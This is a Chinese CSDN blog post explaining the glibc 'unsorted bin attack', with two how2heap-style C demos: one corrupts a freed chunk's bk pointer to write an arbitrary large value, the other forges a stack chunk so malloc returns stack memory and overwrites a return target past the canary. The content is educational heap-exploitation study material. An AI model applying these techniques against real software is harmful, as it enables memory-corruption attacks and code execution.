unstored bins attack

最新推荐文章于 2024-06-20 21:23:57 发布
最新推荐文章于 2024-06-20 21:23:57 发布
阅读量228 收藏 1
点赞数
文章标签: c++ 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62326489/article/details/126468072
版权

1 demo

#include <stdio.h>
#include <stdlib.h>

int main(){

    fprintf(stderr, "unsorted bin attack 实现了把一个超级大的数(unsorted bin 的地址)写到一个地方\n");
    fprintf(stderr, "实际上这种攻击方法常常用来修改 global_max_fast 来为进一步的 fastbin attack 做准备\n\n");

    unsigned long stack_var=0;
    fprintf(stderr, "我们准备把这个地方 %p 的值 %ld 更改为一个很大的数\n\n", &stack_var, stack_var);

    unsigned long *p=malloc(0x410);
    fprintf(stderr, "一开始先申请一个比较正常的 chunk: %p\n",p);
    fprintf(stderr, "再分配一个避免与 top chunk 合并\n\n");
    malloc(500);

    free(p);
    fprintf(stderr, "当我们释放掉第一个 chunk 之后他会被放到 unsorted bin 中,同时它的 bk 指针为 %p\n",(void*)p[1]);

    p[1]=(unsigned long)(&stack_var-2);
    fprintf(stderr, "现在假设有个漏洞,可以让我们修改 free 了的 chunk 的 bk 指针\n");
    fprintf(stderr, "我们把目标地址(想要改为超大值的那个地方)减去 0x10 写到 bk 指针:%p\n\n",(void*)p[1]);

    malloc(0x410);
    fprintf(stderr, "再去 malloc 的时候可以发现那里的值已经改变为 unsorted bin 的地址\n");
    fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

unsigned long stack_var=0;目标写入一个大数

unstored bins是删除的堆无法合并进入top chunk,所以我们创建一个大小为500的堆块防止其并入top chunk

 p[1]=(unsigned long)(&stack_var-2);

这一段内容是

 将之前p的bk改为stack的fd指针

 

free后的堆结构

 

 

然后就可以通过修改-2也就是0x10的地方修改fd指针

 

 3 demo

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); }

int main() {
  intptr_t stack_buffer[4] = {0};

  fprintf(stderr, "先申请 victim chunk\n");
  intptr_t* victim = malloc(0x100);

  fprintf(stderr, "再申请一块防止与 top chunk 合并\n");
  intptr_t* p1 = malloc(0x100);

  fprintf(stderr, "把 %p 这块给释放掉, 会被放进 unsorted bin 中\n", victim);
  free(victim);

  fprintf(stderr, "在栈上伪造一个 chunk");
  fprintf(stderr, "设置 size 与指向可写地址的 bk 指针");
  stack_buffer[1] = 0x100 + 0x10;
  stack_buffer[3] = (intptr_t)stack_buffer;

  //------------VULNERABILITY-----------
  fprintf(stderr, "假设有一个漏洞可以覆盖 victim 的 size 和 bk 指针\n");
  fprintf(stderr, "大小应与下一个请求大小不同,以返回 fake chunk 而不是这个,并且需要通过检查(2*SIZE_SZ 到 av->system_mem)\n");
  victim[-1] = 32;
  victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack

  fprintf(stderr, "现在 malloc 的时候将会返回构造的那个 fake chunk 那里: %p\n", &stack_buffer[2]);
  char *p2 = malloc(0x100);
  fprintf(stderr, "malloc(0x100): %p\n", p2);

  intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
  memcpy((p2+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
}

名字被注册了诶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个实例讲解fastbins上的堆利用附件
09-06
hctf 2016 就是干 一个实例讲解fastbins上的堆利用附件 一个实例讲解fastbins上的堆利用附件一个实例讲解fastbins上的堆利用附件
bianyi.bins
09-02
bianyi.bins
Fastbins attack : Alloc_to_stack
yms0211的博客
04-12 258
Fastbins attack : Alloc_to_stack 这个利用技巧与前面的house of spirit 和 double free很类似。都是利用fastbins 中单链表成员只用 fd 指针这个特点来将伪造的fake_chunk 挂进 fastbins中再申请出来进行利用 回到我们的主题啊,alloc_to_stack,顾名思义,这个技巧就是修改fd 指针将伪造的fake_chunk分配到栈段上面去。 演示: #所用例子为wiki上的例子# typedef struct _chunk {
【堆知识总结 | bins结构】fastbins attack:babyheap_0ctf_2017
ethan18的博客
08-20 205
在堆漏洞这里面已经研究了差不多半个月了,虽然都还是很基础的知识,但是也差不多改收尾去看看别的部分的知识了,遇到不会的堆的题目(大概率会有)再来写堆题目的wp吧想要或多或少总结一下堆chunk里面的一些漏洞,但我做的题也不多,所以能够写的也只有我理解的小小的一部分,并且有点想一出是一出。如果有看我博客的师傅的话请原谅一下哈哈哈。
python hist bins,Python;Matplotlib:将Bins的边界设置为整数值
weixin_42347731的博客
03-01 794
I m drawing a histogram with matplot and I m wondering whether it is possible to set set boundaries of each bin to an integer value. Because if I interpret the Output values of my Plotting correctly i...
frequency bins解释
qq_41891649的博客
06-15 2293
名词解释
frequency bins
Sunshine_victory的博客
02-23 502
frequency bins are intervals between samples in frequency domain. For example, if your sample rate is 100 Hz and your FFT size is 100, then you have 100 points between [0 100) Hz. Therefore, you divide the entire 100 Hz range into 100 intervals, like 0-1 H
python histogram bins_5种方法教你用Python玩转histogram直方图
weixin_39834488的博客
12-05 1316
作者:xiaoyu微信公众号:Python数据科学知乎:python数据分析师直方图是一个可以快速展示数据概率分布的工具,直观易于理解,并深受数据爱好者的喜爱。大家平时可能见到最多就是 matplotlib,seaborn 等高级封装的库包,类似以下这样的绘图。本篇博主将要总结一下使用Python绘制直方图的所有方法,大致可分为三大类(详细划分是五类,参照文末总结):纯Python实现直方图,不使...
Largebin_Attack知识理解(附赠堆分配释放过程回忆!)
a2590035252的博客
09-30 1070
朋友们好啊,我史混源行易太极门掌门人peiWhao。刚才有个朋友问我P老师发生甚么事了,我说怎么回事,给我发了几个网址,我一看!奥!原来是昨天,有一个年轻知识点,一个事largebin、、、、、、
fastbin attack
m0_64195960的博客
07-19 1391
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的堆块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
堆漏洞挖掘中的bins分类(fastbin、unsorted bin、small bin、large bin)
热门推荐
董哥的黑板报
07-23 1万+
一、bin链的介绍 bin是一个由struct chunk结构体组成的链表 前面介绍过,不同的chunk根据特点不同分为不同的chunk,为了将这些chunk进行分类的管理,glibc采用了bin链这种方式管理不同的chunk 不同的bin链是由arena管理的 bin链中的chunk均为free chunk 二、bin链分类 根据bin链成员的大小不同,分为以下几类: fast bi...
python histogram bins_python histogram的画图归一化
weixin_34942785的博客
02-02 953
def get_CDF(numList):print "total number of numList %d"%len(numList)numArray = np.asarray(numList)dx = .01bins_array = np.arange(-0.5,1.5,dx)hist, bin_edges = np.histogram(numArray, bins=bins_array, n...
bins
11-07
tiny6410 1.led_s的bin文件
bins-su-api:从bins.su获取BIN详细信息的API(非官方的,如果bins.su进行了任何更改,它可能会中断)
04-30
Bins-Su-API 从bins.su获取BIN详细信息的API(非官方的,如果bins.su对网站进行了任何更改,则可能不起作用)() 原料药 将获取请求发送到http://yourhost:port/api/{bin} 例子 请求到: ...
Bins 实用任务栏增强工具 带注册码
07-11
Bins 是一款能加强 Windows 任务栏的非常实用的软件,能够给任务栏加上类似 Mac OSX 系统中的 Stack 网格功能,目的是给图标创建分组 (这里叫做Bin)并堆叠起来,让任务栏的空间利用率更高,让你启动常用程序时更加...
C语言中的内存分配方式(静态分配、动态分配)定义以及区别
2402_85246552的博客
06-17 262
这种分配方式主要用于局部变量,特别是那些大小在编译时无法确定,或者需要在程序运行时改变大小的变量。:malloc函数用于在堆(heap)上分配指定字节数的内存,并返回一个指向该内存区域的指针。内存分配发生在程序运行时,所以内存大小和生命周期可以在运行时动态改变。内存分配在程序编译时就已经确定,所以内存大小和生命周期都是固定的。静态分配的变量在函数调用时,它们的内存空间会在函数调用栈帧中分配,并在函数返回时释放。动态分配的变量的内存空间在堆上,函数调用时传递的是指针,所以函数调用的开销相对较小。
项目篇:加入Python程序之如何在Python中使用C++
Francis的博客
06-19 207
项目篇:加速Python程序之如何在Python中使用C++?通常像一些耗时的操作,我们期望在C++中去实现,然后使用Python去调用对应的接口,或者因为底层库的原因,需要支持对外的Python API,那么我们通常需要支持在Python中访问C++,如何实现呢?方法比较多,本节以pybind11为例,引入一个完整的项目工程模版,如果你后续有这种需求,可以基于模版去修改。注:(懒人版)本节的所有...
LeetCode 算法:两两交换链表中的节点 c++
最新发布
小金牛来了
06-20 595
LeetCode 算法:两两交换链表中的节点 c++
11.5.k8s中pod的调度-cordon,drain,delete
qq_22321199的专栏
06-17 550
-ignore-daemonsets #daemonset资源不能被驱逐,需要排除,加这个选项参数排除;--delete-emptydir-data #如果无法驱逐成功,再加这个参数;
matplotlib里的bins
06-11
在matplotlib中,bins是指直方图的区间数或分组数。在绘制直方图时,数据会被分成若干个区间,每个区间内的数据会被统计出现的频数。bins参数可以控制直方图分成多少个区间,从而影响直方图的显示效果。如果bins设置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值